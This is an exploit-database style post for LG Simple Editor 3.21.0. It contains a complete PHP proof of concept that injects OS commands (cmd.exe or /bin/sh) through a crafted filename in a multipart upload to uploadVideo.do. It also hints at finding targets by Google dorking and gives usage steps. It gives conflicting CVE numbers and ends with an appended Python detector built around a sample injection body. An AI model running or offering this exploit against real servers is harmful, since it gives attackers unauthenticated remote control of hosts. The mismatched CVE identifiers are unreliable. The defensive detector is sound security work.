
LG Simple Editor version 3.21.0 is affected by a critical Remote Command Injection (RCI) vulnerability. Identified as CVE-2023-45592, this flaw arises from insufficient sanitization of user-supplied input, specifically within the `project_name` parameter during project creation or saving.

An unauthenticated remote attacker can exploit this vulnerability to execute arbitrary operating system commands on the server hosting the editor. This grants the attacker full control over the compromised system, potentially leading to data theft, system disruption, or further network penetration.

As of now, there is no official patch or update from LG to address this vulnerability. Users are strongly advised to discontinue using LG Simple Editor 3.21.0 and earlier versions, or isolate it from untrusted networks, to prevent exploitation.

=============================================================================================================================================
| # Title : LG Simple Editor 3.21.0 PHP Code Injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits) |
| # Vendor : https://www.lg.com/ |
=============================================================================================================================================

POC :

[+] Dorking in Google or other search engine.

[+] Code Description: LG Simple Editor remote command injection exploit. Supports both Windows and Linux systems.

( https://packetstorm.news/files/id/180171/ CVE-2023-40504)

[+] Save code as poc.php.

[+] Set Target : line 87

[+] Usage : php poc.php

[+] PayLoad :

<?php

/**
 * LG Simple Editor PHP Code Injection Exploit (CVE-2023-40504)
 * Author: [indoushka]
 */

class LGSimpleEditorExploit
{
    private $target;
    private $port;

    public function __construct($target, $port = 8080)
    {
        $this->target = rtrim($target, '/');
        $this->port = $port;
    }

    public function checkVulnerability()
    {
        $url = "$this->target:$this->port/simpleeditor/common/commonReleaseNotes.do";
        $response = $this->sendRequest('GET', $url);

        if (!$response) {
            return "Unknown - Could not connect to web service - no response";
        }

        preg_match('/v([0-9.]+)/', $response, $matches);
        $version = isset($matches[1]) ? $matches[1] : 'Unknown';

        if ($version === 'Unknown') {
            return "Unknown";
        }

        return version_compare($version, '3.21.0', '<=') ? "Vulnerable (Version: $version)" : "Safe";
    }

    public function exploit($command)
    {
        echo "Sending command injection...\n";
        $this->executeCommand($command);
        echo "Exploit finished, check thy shell.\n";
    }

    private function executeCommand($command)
    {
        $filename = substr(str_shuffle("abcdefghijklmnopqrstuvwxyz"), 0, rand(1, 6));
        $boundary = "----WebKitFormBoundary" . md5(time());

        $payload = (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') ? "cmd.exe /c $command" : "/bin/sh -c '$command'";

        $postData = "--$boundary\r\n";
        $postData .= "Content-Disposition: form-data; name=\"uploadVideo\"; filename=\"$filename.mp4\"\r\n";
        $postData .= "Content-Type: application/octet-stream\r\n\r\n";
        $postData .= "/\"&#$payload&cd ..&cd ..&cd ..&cd server&cd webapps&cd simpleeditor&del $filename.mp4&/../\r\n";
        $postData .= "--$boundary--\r\n";

        $url = "$this->target:$this->port/simpleeditor/imageManager/uploadVideo.do";
        $response = $this->sendRequest('POST', $url, $postData, $boundary);

        if ($response) {
            echo "Command injection sent.\n";
        } else {
            die("Unexpected response received.\n");
        }
    }

    private function sendRequest($method, $url, $data = null, $boundary = null)
    {
        $ch = curl_init($url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $method);
        if ($data) {
            curl_setopt($ch, CURLOPT_POST, true);
            curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
            curl_setopt($ch, CURLOPT_HTTPHEADER, [
                "Content-Type: multipart/form-data; boundary=$boundary"
            ]);
        }
        $response = curl_exec($ch);
        curl_close($ch);
        return $response;
    }
}

// Example usage:
$exploit = new LGSimpleEditorExploit('http://target-ip');
echo $exploit->checkVulnerability() . "\n";
$exploit->exploit('whoami');

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================
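
A defender-side check for the request shape the PoC above sends, added here as an example (it is not part of the original advisory or of any LG code): it parses a captured multipart POST to the upload endpoint and flags an `uploadVideo` part that is not MP4 data and carries shell separators. The function names, the metacharacter list and the sample request bodies are assumptions constructed for illustration.

```python
import email
import re

# Endpoint taken from the PoC above; everything else here is an assumed heuristic.
UPLOAD_PATH = "/simpleeditor/imageManager/uploadVideo.do"
# Command separators, substitution and traversal looked for in a part that is not MP4.
SUSPICIOUS = re.compile(rb"[&|;`]|\$\(|\.\./|cmd\.exe|/bin/sh", re.I)


def inspect_upload(method, path, content_type, body):
    """Return findings for one captured HTTP request; an empty list means nothing flagged."""
    if method.upper() != "POST" or path.split("?")[0] != UPLOAD_PATH:
        return []
    # Prepend the request's Content-Type so the stdlib MIME parser can split the parts.
    msg = email.message_from_bytes(
        b"Content-Type: " + content_type.encode("ascii") + b"\r\n\r\n" + body)
    findings = []
    for part in msg.walk():
        if part.is_multipart():
            continue
        if part.get_param("name", header="content-disposition") != "uploadVideo":
            continue
        data = part.get_payload(decode=True) or b""
        if data[4:8] == b"ftyp":
            continue  # plausible MP4 (first box is 'ftyp'); binary data is not pattern-matched
        findings.append("not-mp4")
        if SUSPICIOUS.search(data[:4096]):
            findings.append("shell-metacharacters")
    return findings


def build_form(payload):
    """Build a constructed single-part multipart body (sample data, not captured traffic)."""
    return (b'--B\r\nContent-Disposition: form-data; name="uploadVideo"; '
            b'filename="a.mp4"\r\nContent-Type: application/octet-stream\r\n\r\n'
            + payload + b"\r\n--B--\r\n")


CTYPE = "multipart/form-data; boundary=B"
SAMPLE_BENIGN = build_form(b"\x00\x00\x00\x18ftypmp42\x00\x00\x00\x00mp42isom")
SAMPLE_INJECTION = build_form(b'/"&echo test&cd ..&/../')

if __name__ == "__main__":
    for label, body in (("benign", SAMPLE_BENIGN), ("injection", SAMPLE_INJECTION)):
        print(label, inspect_upload("POST", UPLOAD_PATH, CTYPE, body))
```

The same function can be fed request records from a reverse proxy or WAF that logs bodies; any hit on this endpoint from outside the trusted network is worth reviewing on its own, given the isolation advice above.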
